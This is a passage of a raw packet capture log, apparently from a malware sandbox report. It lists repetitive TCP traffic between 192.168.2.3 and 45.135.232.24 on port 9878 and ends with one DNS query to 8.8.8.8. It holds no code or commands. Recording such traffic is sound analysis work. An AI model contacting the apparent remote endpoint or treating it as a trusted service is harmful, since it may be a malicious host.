                                                                                                                                                                      Aug 21, 2023 19:36:10.773689032 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773833036 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773854017 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773873091 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.773900986 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.773993015 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.774013996 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.774063110 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837270021 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837311983 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837335110 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837475061 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.837728024 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837750912 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837771893 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837899923 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837924004 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837943077 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.837963104 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838620901 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838649988 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838670015 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838685989 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838705063 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838726044 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838747025 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.838766098 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.839039087 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.839152098 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.841137886 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841166973 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841187000 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841204882 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841640949 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841662884 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841834068 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841852903 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.841871977 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.842402935 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.842426062 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.842443943 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899491072 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899532080 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899554968 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899574041 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899593115 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899935007 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899954081 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899956942 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.899971962 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.899992943 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900064945 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.900156021 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900177956 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900197983 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900218010 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900238037 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900259018 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900276899 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900296926 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900320053 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900340080 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900360107 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900379896 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900399923 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.900727034 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.900804996 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.960346937 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960383892 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960402012 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960419893 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960438013 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960457087 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960542917 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960561991 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960580111 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960674047 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960694075 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960750103 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960854053 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960875034 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.960894108 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961126089 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961198092 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961244106 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961282969 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961427927 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961456060 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961482048 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961507082 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961544037 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961589098 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961616993 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961716890 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961744070 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961862087 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.961997032 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962034941 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.962052107 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962133884 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.962163925 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962352037 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962398052 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962441921 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962487936 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962531090 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962574005 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962618113 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962661982 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962732077 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962799072 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962888002 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962934017 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.962977886 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.963021040 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:10.963397026 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:10.963500023 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:11.023137093 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.023178101 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.023267031 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.023287058 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.023305893 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.023751974 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.023773909 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.023792982 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.024146080 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.024167061 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.024183035 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.024605989 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.024626970 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.024646044 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.024849892 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.025063992 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.025098085 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.025115967 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.025574923 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.025594950 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.025613070 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.025875092 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.025898933 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.025918961 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.026303053 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.026325941 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.026346922 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.026741028 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.026742935 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:11.026763916 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.026813984 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.026875019 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:11.026876926 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.027134895 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.027153015 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.027169943 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.027544975 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.027563095 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.027582884 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.027863979 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.027883053 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.027903080 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.028377056 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.028395891 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.028414011 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.028808117 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.028830051 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.028847933 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.029078007 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.029103994 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.029386044 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.029406071 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.029428005 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.029820919 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:11.029931068 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:11.086855888 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.086898088 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.086920023 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087004900 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087024927 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087044954 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087063074 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087268114 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087285042 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087301016 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087516069 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087534904 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087554932 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087635040 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087654114 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087671041 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087822914 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087843895 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.087862015 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.088046074 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.088063955 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.088079929 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.089765072 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.089812994 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.089833021 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.089875937 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.089895964 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.089915037 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090055943 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090073109 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090090990 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090109110 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090282917 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090302944 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090431929 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090464115 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:11.090503931 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090528011 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090548038 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090574026 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:11.090823889 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090841055 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090857983 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090874910 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090950012 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090967894 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.090986967 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.091406107 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:11.091491938 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:11.150657892 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.150712013 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.150749922 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.150820971 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.150866985 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.150902033 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151089907 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151139021 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151186943 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151233912 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151282072 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151329041 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151376963 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151459932 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151496887 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151530027 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151563883 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151690960 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151726961 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151761055 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151793957 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.151828051 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152023077 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152074099 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152106047 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152144909 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:11.152152061 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152198076 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152242899 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152291059 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152338028 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152384043 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152432919 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152477026 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152520895 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152734041 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152779102 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152828932 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152874947 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152919054 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.152965069 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.153011084 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.153064013 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.153112888 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.153160095 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213267088 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213311911 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213347912 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213540077 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213572025 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213603973 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213754892 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213779926 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.213869095 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.214453936 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.214529037 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.214596987 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.214736938 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.214809895 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.214884043 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.214926958 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.216856003 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.249594927 CEST98784973745.135.232.24192.168.2.3
                                                                                                                                                                      Aug 21, 2023 19:36:11.302247047 CEST497379878192.168.2.345.135.232.24
                                                                                                                                                                      Aug 21, 2023 19:36:34.271972895 CEST497379878192.168.2.345.135.232.24

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Aug 21, 2023 19:35:21.405807972 CEST6000053192.168.2.38.8.8.8
                                                                                                                                                                      Aug 21, 2023 19:35:21.497184992 CEST53600008.8.8.8192.168.2.3
